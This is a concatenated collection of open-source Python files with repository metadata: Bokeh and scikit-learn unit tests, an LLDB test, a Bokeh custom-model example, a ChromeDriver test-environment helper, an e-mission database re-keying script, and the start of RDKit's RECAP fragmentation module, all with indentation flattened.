#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
from mock import patch
# External imports
from six import string_types
# Bokeh imports
# Module under test
import bokeh.client.session as bcs
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
def test_module_docstring_warning():
assert bcs._BOKEH_CLIENT_APP_WARNING_BODY in bcs.__doc__
def test_DEFAULT_SESSION_ID():
assert bcs.DEFAULT_SESSION_ID == "default"
def test_DEFAULT_SERVER_WEBSOCKET_URL():
assert bcs.DEFAULT_SERVER_WEBSOCKET_URL == "ws://localhost:5006/ws"
class Test_ClientSession(object):
def test_creation_defaults(self):
s = bcs.ClientSession()
assert s.connected == False
assert s.document is None
assert s._connection._arguments is None
assert isinstance(s.id, string_types)
assert len(s.id) == 44
def test_creation_with_session_id(self):
s = bcs.ClientSession("sid")
assert s.connected == False
assert s.document is None
assert s._connection._arguments is None
assert s.id == "sid"
def test_creation_with_ws_url(self):
s = bcs.ClientSession(websocket_url="wsurl")
assert s.connected == False
assert s.document is None
assert s._connection._arguments is None
assert s._connection.url == "wsurl"
assert isinstance(s.id, string_types)
assert len(s.id) == 44
def test_creation_with_ioloop(self):
s = bcs.ClientSession(io_loop="io_loop")
assert s.connected == False
assert s.document is None
assert s._connection._arguments is None
assert s._connection.io_loop == "io_loop"
assert isinstance(s.id, string_types)
assert len(s.id) == 44
def test_creation_with_arguments(self):
s = bcs.ClientSession(arguments="args")
assert s.connected == False
assert s.document is None
assert s._connection._arguments == "args"
assert len(s.id) == 44
@patch("bokeh.client.connection.ClientConnection.connect")
def test_connect(self, mock_connect):
s = bcs.ClientSession()
s.connect()
assert mock_connect.call_count == 1
assert mock_connect.call_args[0] == ()
assert mock_connect.call_args[1] == {}
@patch("bokeh.client.connection.ClientConnection.close")
def test_close(self, mock_close):
s = bcs.ClientSession()
s.close()
assert mock_close.call_count == 1
assert mock_close.call_args[0] == ("closed",)
assert mock_close.call_args[1] == {}
@patch("bokeh.client.connection.ClientConnection.close")
def test_context_manager(self, mock_close):
with bcs.ClientSession() as session:
assert isinstance(session, bcs.ClientSession)
assert mock_close.call_count == 1
assert mock_close.call_args[0] == ("closed",)
assert mock_close.call_args[1] == {}
@patch("bokeh.client.connection.ClientConnection.close")
def test_close_with_why(self, mock_close):
s = bcs.ClientSession()
s.close("foo")
assert mock_close.call_count == 1
assert mock_close.call_args[0] == ("foo",)
assert mock_close.call_args[1] == {}
@patch("bokeh.client.connection.ClientConnection.force_roundtrip")
def test_force_roundtrip(self, mock_force_roundtrip):
s = bcs.ClientSession()
s.force_roundtrip()
assert mock_force_roundtrip.call_count == 1
assert mock_force_roundtrip.call_args[0] == ()
assert mock_force_roundtrip.call_args[1] == {}
@patch("warnings.warn")
@patch("bokeh.client.connection.ClientConnection.loop_until_closed")
def test_loop_until_closed(self, mock_loop_until_closed, mock_warn):
s = bcs.ClientSession()
s.loop_until_closed()
assert mock_loop_until_closed.call_count == 1
assert mock_loop_until_closed.call_args[0] == ()
assert mock_loop_until_closed.call_args[1] == {}
assert mock_warn.call_count == 1
assert mock_warn.call_args[0] == (bcs._BOKEH_CLIENT_APP_WARNING_FULL,)
assert mock_warn.call_args[1] == {}
@patch("warnings.warn")
@patch("bokeh.client.connection.ClientConnection.loop_until_closed")
def test_loop_until_closed_suppress_warnings(self, mock_loop_until_closed, mock_warn):
s = bcs.ClientSession()
s.loop_until_closed(True)
assert mock_loop_until_closed.call_count == 1
assert mock_loop_until_closed.call_args[0] == ()
assert mock_loop_until_closed.call_args[1] == {}
assert mock_warn.call_count == 0
@patch("bokeh.client.connection.ClientConnection.request_server_info")
def test_request_server_info(self, mock_request_server_info):
s = bcs.ClientSession()
s.request_server_info()
assert mock_request_server_info.call_count == 1
assert mock_request_server_info.call_args[0] == ()
assert mock_request_server_info.call_args[1] == {}
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
mindriot101/bokeh
|
bokeh/client/tests/test_session.py
|
Python
|
bsd-3-clause
| 6,568
|
import pickle
import tempfile
import shutil
import os
import numbers
import numpy as np
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_raises_regexp
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import ignore_warnings
from sklearn.utils.testing import assert_not_equal
from sklearn.utils.testing import assert_warns_message
from sklearn.base import BaseEstimator
from sklearn.metrics import (f1_score, r2_score, roc_auc_score, fbeta_score,
log_loss, precision_score, recall_score)
from sklearn.metrics.cluster import adjusted_rand_score
from sklearn.metrics.scorer import (check_scoring, _PredictScorer,
_passthrough_scorer)
from sklearn.metrics import make_scorer, get_scorer, SCORERS
from sklearn.svm import LinearSVC
from sklearn.pipeline import make_pipeline
from sklearn.cluster import KMeans
from sklearn.dummy import DummyRegressor
from sklearn.linear_model import Ridge, LogisticRegression
from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.datasets import make_blobs
from sklearn.datasets import make_classification
from sklearn.datasets import make_multilabel_classification
from sklearn.datasets import load_diabetes
from sklearn.model_selection import train_test_split, cross_val_score
from sklearn.model_selection import GridSearchCV
from sklearn.multiclass import OneVsRestClassifier
from sklearn.externals import joblib
REGRESSION_SCORERS = ['r2', 'neg_mean_absolute_error',
'neg_mean_squared_error', 'neg_mean_squared_log_error',
'neg_median_absolute_error', 'mean_absolute_error',
'mean_squared_error', 'median_absolute_error']
CLF_SCORERS = ['accuracy', 'f1', 'f1_weighted', 'f1_macro', 'f1_micro',
'roc_auc', 'average_precision', 'precision',
'precision_weighted', 'precision_macro', 'precision_micro',
'recall', 'recall_weighted', 'recall_macro', 'recall_micro',
'neg_log_loss', 'log_loss',
'adjusted_rand_score' # not really, but works
]
MULTILABEL_ONLY_SCORERS = ['precision_samples', 'recall_samples', 'f1_samples']
def _make_estimators(X_train, y_train, y_ml_train):
# Make estimators that make sense to test various scoring methods
sensible_regr = DummyRegressor(strategy='median')
sensible_regr.fit(X_train, y_train)
sensible_clf = DecisionTreeClassifier(random_state=0)
sensible_clf.fit(X_train, y_train)
sensible_ml_clf = DecisionTreeClassifier(random_state=0)
sensible_ml_clf.fit(X_train, y_ml_train)
return dict(
[(name, sensible_regr) for name in REGRESSION_SCORERS] +
[(name, sensible_clf) for name in CLF_SCORERS] +
[(name, sensible_ml_clf) for name in MULTILABEL_ONLY_SCORERS]
)
X_mm, y_mm, y_ml_mm = None, None, None
ESTIMATORS = None
TEMP_FOLDER = None
def setup_module():
# Create some memory mapped data
global X_mm, y_mm, y_ml_mm, TEMP_FOLDER, ESTIMATORS
TEMP_FOLDER = tempfile.mkdtemp(prefix='sklearn_test_score_objects_')
X, y = make_classification(n_samples=30, n_features=5, random_state=0)
_, y_ml = make_multilabel_classification(n_samples=X.shape[0],
random_state=0)
filename = os.path.join(TEMP_FOLDER, 'test_data.pkl')
joblib.dump((X, y, y_ml), filename)
X_mm, y_mm, y_ml_mm = joblib.load(filename, mmap_mode='r')
ESTIMATORS = _make_estimators(X_mm, y_mm, y_ml_mm)
def teardown_module():
global X_mm, y_mm, y_ml_mm, TEMP_FOLDER, ESTIMATORS
# GC closes the mmap file descriptors
X_mm, y_mm, y_ml_mm, ESTIMATORS = None, None, None, None
shutil.rmtree(TEMP_FOLDER)
class EstimatorWithoutFit(object):
"""Dummy estimator to test check_scoring"""
pass
class EstimatorWithFit(BaseEstimator):
"""Dummy estimator to test check_scoring"""
def fit(self, X, y):
return self
class EstimatorWithFitAndScore(object):
"""Dummy estimator to test check_scoring"""
def fit(self, X, y):
return self
def score(self, X, y):
return 1.0
class EstimatorWithFitAndPredict(object):
"""Dummy estimator to test check_scoring"""
def fit(self, X, y):
self.y = y
return self
def predict(self, X):
return self.y
class DummyScorer(object):
"""Dummy scorer that always returns 1."""
def __call__(self, est, X, y):
return 1
def test_all_scorers_repr():
# Test that all scorers have a working repr
for name, scorer in SCORERS.items():
repr(scorer)
def test_check_scoring():
# Test all branches of check_scoring
estimator = EstimatorWithoutFit()
pattern = (r"estimator should be an estimator implementing 'fit' method,"
r" .* was passed")
assert_raises_regexp(TypeError, pattern, check_scoring, estimator)
estimator = EstimatorWithFitAndScore()
estimator.fit([[1]], [1])
scorer = check_scoring(estimator)
assert_true(scorer is _passthrough_scorer)
assert_almost_equal(scorer(estimator, [[1]], [1]), 1.0)
estimator = EstimatorWithFitAndPredict()
estimator.fit([[1]], [1])
pattern = (r"If no scoring is specified, the estimator passed should have"
r" a 'score' method\. The estimator .* does not\.")
assert_raises_regexp(TypeError, pattern, check_scoring, estimator)
scorer = check_scoring(estimator, "accuracy")
assert_almost_equal(scorer(estimator, [[1]], [1]), 1.0)
estimator = EstimatorWithFit()
scorer = check_scoring(estimator, "accuracy")
assert_true(isinstance(scorer, _PredictScorer))
estimator = EstimatorWithFit()
scorer = check_scoring(estimator, allow_none=True)
assert_true(scorer is None)
def test_check_scoring_gridsearchcv():
# test that check_scoring works on GridSearchCV and pipeline.
# slightly redundant non-regression test.
grid = GridSearchCV(LinearSVC(), param_grid={'C': [.1, 1]})
scorer = check_scoring(grid, "f1")
assert_true(isinstance(scorer, _PredictScorer))
pipe = make_pipeline(LinearSVC())
scorer = check_scoring(pipe, "f1")
assert_true(isinstance(scorer, _PredictScorer))
# check that cross_val_score definitely calls the scorer
# and doesn't make any assumptions about the estimator apart from having a
# fit.
scores = cross_val_score(EstimatorWithFit(), [[1], [2], [3]], [1, 0, 1],
scoring=DummyScorer())
assert_array_equal(scores, 1)
def test_make_scorer():
# Sanity check on the make_scorer factory function.
f = lambda *args: 0
assert_raises(ValueError, make_scorer, f, needs_threshold=True,
needs_proba=True)
def test_classification_scores():
# Test classification scorers.
X, y = make_blobs(random_state=0, centers=2)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
clf = LinearSVC(random_state=0)
clf.fit(X_train, y_train)
for prefix, metric in [('f1', f1_score), ('precision', precision_score),
('recall', recall_score)]:
score1 = get_scorer('%s_weighted' % prefix)(clf, X_test, y_test)
score2 = metric(y_test, clf.predict(X_test), pos_label=None,
average='weighted')
assert_almost_equal(score1, score2)
score1 = get_scorer('%s_macro' % prefix)(clf, X_test, y_test)
score2 = metric(y_test, clf.predict(X_test), pos_label=None,
average='macro')
assert_almost_equal(score1, score2)
score1 = get_scorer('%s_micro' % prefix)(clf, X_test, y_test)
score2 = metric(y_test, clf.predict(X_test), pos_label=None,
average='micro')
assert_almost_equal(score1, score2)
score1 = get_scorer('%s' % prefix)(clf, X_test, y_test)
score2 = metric(y_test, clf.predict(X_test), pos_label=1)
assert_almost_equal(score1, score2)
# test fbeta score that takes an argument
scorer = make_scorer(fbeta_score, beta=2)
score1 = scorer(clf, X_test, y_test)
score2 = fbeta_score(y_test, clf.predict(X_test), beta=2)
assert_almost_equal(score1, score2)
# test that custom scorer can be pickled
unpickled_scorer = pickle.loads(pickle.dumps(scorer))
score3 = unpickled_scorer(clf, X_test, y_test)
assert_almost_equal(score1, score3)
# smoke test the repr:
repr(fbeta_score)
def test_regression_scorers():
# Test regression scorers.
diabetes = load_diabetes()
X, y = diabetes.data, diabetes.target
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
clf = Ridge()
clf.fit(X_train, y_train)
score1 = get_scorer('r2')(clf, X_test, y_test)
score2 = r2_score(y_test, clf.predict(X_test))
assert_almost_equal(score1, score2)
def test_thresholded_scorers():
# Test scorers that take thresholds.
X, y = make_blobs(random_state=0, centers=2)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
clf = LogisticRegression(random_state=0)
clf.fit(X_train, y_train)
score1 = get_scorer('roc_auc')(clf, X_test, y_test)
score2 = roc_auc_score(y_test, clf.decision_function(X_test))
score3 = roc_auc_score(y_test, clf.predict_proba(X_test)[:, 1])
assert_almost_equal(score1, score2)
assert_almost_equal(score1, score3)
logscore = get_scorer('neg_log_loss')(clf, X_test, y_test)
logloss = log_loss(y_test, clf.predict_proba(X_test))
assert_almost_equal(-logscore, logloss)
# same for an estimator without decision_function
clf = DecisionTreeClassifier()
clf.fit(X_train, y_train)
score1 = get_scorer('roc_auc')(clf, X_test, y_test)
score2 = roc_auc_score(y_test, clf.predict_proba(X_test)[:, 1])
assert_almost_equal(score1, score2)
# test with a regressor (no decision_function)
reg = DecisionTreeRegressor()
reg.fit(X_train, y_train)
score1 = get_scorer('roc_auc')(reg, X_test, y_test)
score2 = roc_auc_score(y_test, reg.predict(X_test))
assert_almost_equal(score1, score2)
# Test that an exception is raised on more than two classes
X, y = make_blobs(random_state=0, centers=3)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
clf.fit(X_train, y_train)
assert_raises(ValueError, get_scorer('roc_auc'), clf, X_test, y_test)
def test_thresholded_scorers_multilabel_indicator_data():
# Test that the scorer work with multilabel-indicator format
# for multilabel and multi-output multi-class classifier
X, y = make_multilabel_classification(allow_unlabeled=False,
random_state=0)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
# Multi-output multi-class predict_proba
clf = DecisionTreeClassifier()
clf.fit(X_train, y_train)
y_proba = clf.predict_proba(X_test)
score1 = get_scorer('roc_auc')(clf, X_test, y_test)
score2 = roc_auc_score(y_test, np.vstack(p[:, -1] for p in y_proba).T)
assert_almost_equal(score1, score2)
# Multi-output multi-class decision_function
# TODO Is there any yet?
clf = DecisionTreeClassifier()
clf.fit(X_train, y_train)
clf._predict_proba = clf.predict_proba
clf.predict_proba = None
clf.decision_function = lambda X: [p[:, 1] for p in clf._predict_proba(X)]
y_proba = clf.decision_function(X_test)
score1 = get_scorer('roc_auc')(clf, X_test, y_test)
score2 = roc_auc_score(y_test, np.vstack(p for p in y_proba).T)
assert_almost_equal(score1, score2)
# Multilabel predict_proba
clf = OneVsRestClassifier(DecisionTreeClassifier())
clf.fit(X_train, y_train)
score1 = get_scorer('roc_auc')(clf, X_test, y_test)
score2 = roc_auc_score(y_test, clf.predict_proba(X_test))
assert_almost_equal(score1, score2)
# Multilabel decision function
clf = OneVsRestClassifier(LinearSVC(random_state=0))
clf.fit(X_train, y_train)
score1 = get_scorer('roc_auc')(clf, X_test, y_test)
score2 = roc_auc_score(y_test, clf.decision_function(X_test))
assert_almost_equal(score1, score2)
def test_unsupervised_scorers():
# Test clustering scorers against gold standard labeling.
# We don't have any real unsupervised Scorers yet.
X, y = make_blobs(random_state=0, centers=2)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
km = KMeans(n_clusters=3)
km.fit(X_train)
score1 = get_scorer('adjusted_rand_score')(km, X_test, y_test)
score2 = adjusted_rand_score(y_test, km.predict(X_test))
assert_almost_equal(score1, score2)
@ignore_warnings
def test_raises_on_score_list():
# Test that when a list of scores is returned, we raise proper errors.
X, y = make_blobs(random_state=0)
f1_scorer_no_average = make_scorer(f1_score, average=None)
clf = DecisionTreeClassifier()
assert_raises(ValueError, cross_val_score, clf, X, y,
scoring=f1_scorer_no_average)
grid_search = GridSearchCV(clf, scoring=f1_scorer_no_average,
param_grid={'max_depth': [1, 2]})
assert_raises(ValueError, grid_search.fit, X, y)
@ignore_warnings
def test_scorer_sample_weight():
# Test that scorers support sample_weight or raise sensible errors
# Unlike the metrics invariance test, in the scorer case it's harder
# to ensure that, on the classifier output, weighted and unweighted
# scores really should be unequal.
X, y = make_classification(random_state=0)
_, y_ml = make_multilabel_classification(n_samples=X.shape[0],
random_state=0)
split = train_test_split(X, y, y_ml, random_state=0)
X_train, X_test, y_train, y_test, y_ml_train, y_ml_test = split
sample_weight = np.ones_like(y_test)
sample_weight[:10] = 0
# get sensible estimators for each metric
estimator = _make_estimators(X_train, y_train, y_ml_train)
for name, scorer in SCORERS.items():
if name in MULTILABEL_ONLY_SCORERS:
target = y_ml_test
else:
target = y_test
try:
weighted = scorer(estimator[name], X_test, target,
sample_weight=sample_weight)
ignored = scorer(estimator[name], X_test[10:], target[10:])
unweighted = scorer(estimator[name], X_test, target)
assert_not_equal(weighted, unweighted,
msg="scorer {0} behaves identically when "
"called with sample weights: {1} vs "
"{2}".format(name, weighted, unweighted))
assert_almost_equal(weighted, ignored,
err_msg="scorer {0} behaves differently when "
"ignoring samples and setting sample_weight to"
" 0: {1} vs {2}".format(name, weighted,
ignored))
except TypeError as e:
assert_true("sample_weight" in str(e),
"scorer {0} raises unhelpful exception when called "
"with sample weights: {1}".format(name, str(e)))
@ignore_warnings # UndefinedMetricWarning for P / R scores
def check_scorer_memmap(scorer_name):
scorer, estimator = SCORERS[scorer_name], ESTIMATORS[scorer_name]
if scorer_name in MULTILABEL_ONLY_SCORERS:
score = scorer(estimator, X_mm, y_ml_mm)
else:
score = scorer(estimator, X_mm, y_mm)
assert isinstance(score, numbers.Number), scorer_name
def test_scorer_memmap_input():
# Non-regression test for #6147: some score functions would
# return singleton memmap when computed on memmap data instead of scalar
# float values.
for name in SCORERS.keys():
yield check_scorer_memmap, name
def test_deprecated_names():
X, y = make_blobs(random_state=0, centers=2)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
clf = LogisticRegression(random_state=0)
clf.fit(X_train, y_train)
for name in ('mean_absolute_error', 'mean_squared_error',
'median_absolute_error', 'log_loss'):
warning_msg = "Scoring method %s was renamed to" % name
for scorer in (get_scorer(name), SCORERS[name]):
assert_warns_message(DeprecationWarning,
warning_msg,
scorer, clf, X, y)
assert_warns_message(DeprecationWarning,
warning_msg,
cross_val_score, clf, X, y, scoring=name)
def test_scoring_is_not_metric():
assert_raises_regexp(ValueError, 'make_scorer', check_scoring,
LogisticRegression(), f1_score)
assert_raises_regexp(ValueError, 'make_scorer', check_scoring,
LogisticRegression(), roc_auc_score)
assert_raises_regexp(ValueError, 'make_scorer', check_scoring,
Ridge(), r2_score)
assert_raises_regexp(ValueError, 'make_scorer', check_scoring,
KMeans(), adjusted_rand_score)
|
meduz/scikit-learn
|
sklearn/metrics/tests/test_score_objects.py
|
Python
|
bsd-3-clause
| 17,473
|
"""Test that types defined in shared libraries work correctly."""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestRealDefinition(TestBase):
mydir = TestBase.compute_mydir(__file__)
@skipUnlessDarwin
def test_frame_var_after_stop_at_implementation(self):
"""Test that we can find the implementation for an objective C type"""
if self.getArchitecture() == 'i386':
self.skipTest("requires modern objc runtime")
self.build()
self.shlib_names = ["libTestExt.dylib", "libTest.dylib"]
self.common_setup()
line = line_number('TestExt/TestExt.m', '// break here')
lldbutil.run_break_set_by_file_and_line(
self, 'TestExt.m', line, num_expected_locations=1, loc_exact=True)
self.runCmd("run", RUN_SUCCEEDED)
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs=['stopped',
'stop reason = breakpoint'])
self.expect("breakpoint list -f", BREAKPOINT_HIT_ONCE,
substrs=[' resolved, hit count = 1'])
# This should display correctly.
self.expect(
"expr 42",
"A simple expression should execute correctly",
substrs=[
"42"])
def common_setup(self):
exe = self.getBuildArtifact("a.out")
target = self.dbg.CreateTarget(exe)
self.registerSharedLibrariesWithTarget(target, self.shlib_names)
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
|
endlessm/chromium-browser
|
third_party/llvm/lldb/test/API/lang/objc/conflicting-definition/TestConflictingDefinition.py
|
Python
|
bsd-3-clause
| 1,681
|
from __future__ import print_function
from bokeh.core.properties import String
from bokeh.document import Document
from bokeh.embed import file_html
from bokeh.models.callbacks import Callback
from bokeh.models.glyphs import Circle
from bokeh.models import Plot, DataRange1d, LinearAxis, ColumnDataSource, PanTool, WheelZoomTool, TapTool
from bokeh.models.layouts import HBox
from bokeh.resources import INLINE
from bokeh.util.browser import view
class Popup(Callback):
__implementation__ = """
_ = require "underscore"
Util = require "util/util"
Model = require "model"
p = require "core/properties"
class Popup extends Model
type: "Popup"
execute: (data_source) ->
for i in Util.get_indices(data_source)
message = Util.replace_placeholders(@get("message"), data_source, i)
window.alert(message)
null
@define {
message: [ p.String, "" ]
}
module.exports =
Model: Popup
"""
message = String("", help="""
Message to display in a popup window. This can be a template string,
which will be formatted with data from the data source.
""")
class MyHBox(HBox):
__implementation__ = """
HBox = require "models/layouts/hbox"
class MyHBoxView extends HBox.View
render: () ->
super()
@$el.css({border: "5px solid black"})
class MyHBox extends HBox.Model
type: "MyHBox"
default_view: MyHBoxView
module.exports = {
Model: MyHBox
View: MyHBoxView
}
"""
source = ColumnDataSource(
data = dict(
x = [1, 2, 3, 4, 4, 5, 5],
y = [5, 4, 3, 2, 2.1, 1, 1.1],
color = ["rgb(0, 100, 120)", "green", "blue", "#2c7fb8", "#2c7fb8", "rgba(120, 230, 150, 0.5)", "rgba(120, 230, 150, 0.5)"]
)
)
xdr = DataRange1d()
ydr = DataRange1d()
plot = Plot(x_range=xdr, y_range=ydr)
circle = Circle(x="x", y="y", radius=0.2, fill_color="color", line_color="black")
circle_renderer = plot.add_glyph(source, circle)
plot.add_layout(LinearAxis(), 'below')
plot.add_layout(LinearAxis(), 'left')
tap = TapTool(renderers=[circle_renderer], callback=Popup(message="Selected color: @color"))
plot.add_tools(PanTool(), WheelZoomTool(), tap)
doc = Document()
doc.add_root(MyHBox(children=[plot]))
if __name__ == "__main__":
filename = "custom.html"
with open(filename, "w") as f:
f.write(file_html(doc, INLINE, "Demonstration of user-defined models"))
print("Wrote %s" % filename)
view(filename)
|
pombredanne/bokeh
|
examples/models/custom.py
|
Python
|
bsd-3-clause
| 2,401
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""TestEnvironment classes.
These classes abstract away the various setups needed to run the WebDriver java
tests in various environments.
"""
from __future__ import absolute_import
import logging
import os
import sys
import chrome_paths
import util
_THIS_DIR = os.path.abspath(os.path.dirname(__file__))
if util.IsLinux():
sys.path.insert(0, os.path.join(chrome_paths.GetSrc(), 'third_party',
'catapult', 'devil'))
from devil.android import device_errors
from devil.android import device_utils
from devil.android import forwarder
sys.path.insert(0, os.path.join(chrome_paths.GetSrc(), 'build', 'android'))
import devil_chromium
ANDROID_TEST_HTTP_PORT = 2311
ANDROID_TEST_HTTPS_PORT = 2411
_EXPECTATIONS = {}
exec(compile(open(os.path.join(_THIS_DIR, 'test_expectations'), "rb").read(), \
os.path.join(_THIS_DIR, 'test_expectations'), 'exec'), _EXPECTATIONS)
class BaseTestEnvironment(object):
"""Manages the environment java tests require to run."""
def __init__(self, chrome_version='HEAD'):
"""Initializes a desktop test environment.
Args:
chrome_version: Optionally a chrome version to run the tests against.
"""
self._chrome_version = chrome_version
def GetOS(self):
"""Name of the OS."""
raise NotImplementedError
def GlobalSetUp(self):
"""Sets up the global test environment state."""
pass
def GlobalTearDown(self):
"""Tears down the global test environment state."""
pass
def GetDisabledJavaTestMatchers(self):
"""Get the list of disabled java test matchers.
Returns:
List of disabled test matchers, which may contain '*' wildcards.
"""
return _EXPECTATIONS['GetDisabledTestMatchers'](self.GetOS())
def GetReadyToRunJavaTestMatchers(self):
"""Get the list of disabled for Chrome java test matchers
but which already works.
Returns:
List of disabled for Chrome java test matchers
but which already works.
"""
return _EXPECTATIONS['GetReadyToRunTestMatchers']()
def GetPassedJavaTests(self):
"""Get the list of passed java tests.
Returns:
List of passed test names.
"""
with open(os.path.join(_THIS_DIR, 'java_tests.txt'), 'r') as f:
return _EXPECTATIONS['ApplyJavaTestFilter'](
self.GetOS(), [t.strip('\n') for t in f.readlines()])
class DesktopTestEnvironment(BaseTestEnvironment):
"""Manages the environment java tests require to run on Desktop."""
# override
def GetOS(self):
return util.GetPlatformName()
class AndroidTestEnvironment(DesktopTestEnvironment):
"""Manages the environment java tests require to run on Android."""
def __init__(self, package, chrome_version='HEAD'):
super(AndroidTestEnvironment, self).__init__(chrome_version)
self._package = package
self._device = None
self._forwarder = None
# override
def GlobalSetUp(self):
devil_chromium.Initialize()
os.putenv('TEST_HTTP_PORT', str(ANDROID_TEST_HTTP_PORT))
os.putenv('TEST_HTTPS_PORT', str(ANDROID_TEST_HTTPS_PORT))
devices = device_utils.DeviceUtils.HealthyDevices()
if not devices:
raise device_errors.NoDevicesError()
elif len(devices) > 1:
logging.warning('Multiple devices attached. Using %s.' % devices[0])
self._device = devices[0]
forwarder.Forwarder.Map(
[(ANDROID_TEST_HTTP_PORT, ANDROID_TEST_HTTP_PORT),
(ANDROID_TEST_HTTPS_PORT, ANDROID_TEST_HTTPS_PORT)],
self._device)
# override
def GlobalTearDown(self):
if self._device:
forwarder.Forwarder.UnmapAllDevicePorts(self._device)
# override
def GetOS(self):
return 'android:%s' % self._package
|
ric2b/Vivaldi-browser
|
chromium/chrome/test/chromedriver/test/test_environment.py
|
Python
|
bsd-3-clause
| 3,855
|
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import *
import emission.core.get_database as edb
def fix_key(check_field, new_key):
print("First entry for "+new_key+" is %s" % list(edb.get_timeseries_db().find(
{"metadata.key": "config/sensor_config",
check_field: {"$exists": True}}).sort(
"metadata/write_ts").limit(1)))
udb = edb.get_usercache_db()
tdb = edb.get_timeseries_db()
for i, entry in enumerate(edb.get_timeseries_db().find(
{"metadata.key": "config/sensor_config",
check_field: {"$exists": True}})):
entry["metadata"]["key"] = new_key
if i % 10000 == 0:
print(udb.insert(entry))
print(tdb.remove(entry["_id"]))
else:
udb.insert(entry)
tdb.remove(entry["_id"])
fix_key("data.battery_status", "background/battery")
fix_key("data.latitude", "background/location")
fix_key("data.zzaEh", "background/motion_activity")
fix_key("data.currState", "statemachine/transition")
|
e-mission/e-mission-server
|
bin/historical/fix_sensor_config_key.py
|
Python
|
bsd-3-clause
| 1,342
|
# $Id$
#
# Copyright (c) 2007, Novartis Institutes for BioMedical Research Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Novartis Institutes for BioMedical Research Inc.
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
""" Implementation of the RECAP algorithm from Lewell et al. JCICS *38* 511-522 (1998)
The published algorithm is implemented more or less without
modification. The results are returned as a hierarchy of nodes instead
of just as a set of fragments. The hope is that this will allow a bit
more flexibility in working with the results.
For example:
>>> m = Chem.MolFromSmiles('C1CC1Oc1ccccc1-c1ncc(OC)cc1')
>>> res = Recap.RecapDecompose(m)
>>> res
<Chem.Recap.RecapHierarchyNode object at 0x00CDB5D0>
>>> res.children.keys()
['[*]C1CC1', '[*]c1ccccc1-c1ncc(OC)cc1', '[*]c1ccc(OC)cn1', '[*]c1ccccc1OC1CC1']
>>> res.GetAllChildren().keys()
['[*]c1ccccc1[*]', '[*]C1CC1', '[*]c1ccccc1-c1ncc(OC)cc1', '[*]c1ccc(OC)cn1', '[*]c1ccccc1OC1CC1']
To get the standard set of RECAP results, use GetLeaves():
>>> leaves=res.GetLeaves()
>>> leaves.keys()
['[*]c1ccccc1[*]', '[*]c1ccc(OC)cn1', '[*]C1CC1']
>>> leaf = leaves['[*]C1CC1']
>>> leaf.mol
<Chem.rdchem.Mol object at 0x00CBE0F0>
"""
import sys
import weakref
from rdkit import Chem
from rdkit.Chem import rdChemReactions as Reactions
from rdkit.six import iterkeys, iteritems, next
# These are the definitions that will be applied to fragment molecules:
reactionDefs = (
"[#7;+0;D2,D3:1]!@C(!@=O)!@[#7;+0;D2,D3:2]>>[*][#7:1].[#7:2][*]", # urea
"[C;!$(C([#7])[#7]):1](=!@[O:2])!@[#7;+0;!D1:3]>>[*][C:1]=[O:2].[*][#7:3]", # amide
"[C:1](=!@[O:2])!@[O;+0:3]>>[*][C:1]=[O:2].[O:3][*]", # ester
"[N;!D1;+0;!$(N-C=[#7,#8,#15,#16])](-!@[*:1])-!@[*:2]>>[*][*:1].[*:2][*]", # amines
#"[N;!D1](!@[*:1])!@[*:2]>>[*][*:1].[*:2][*]", # amines
# again: what about aromatics?
"[#7;R;D3;+0:1]-!@[*:2]>>[*][#7:1].[*:2][*]", # cyclic amines
"[#6:1]-!@[O;+0]-!@[#6:2]>>[#6:1][*].[*][#6:2]", # ether
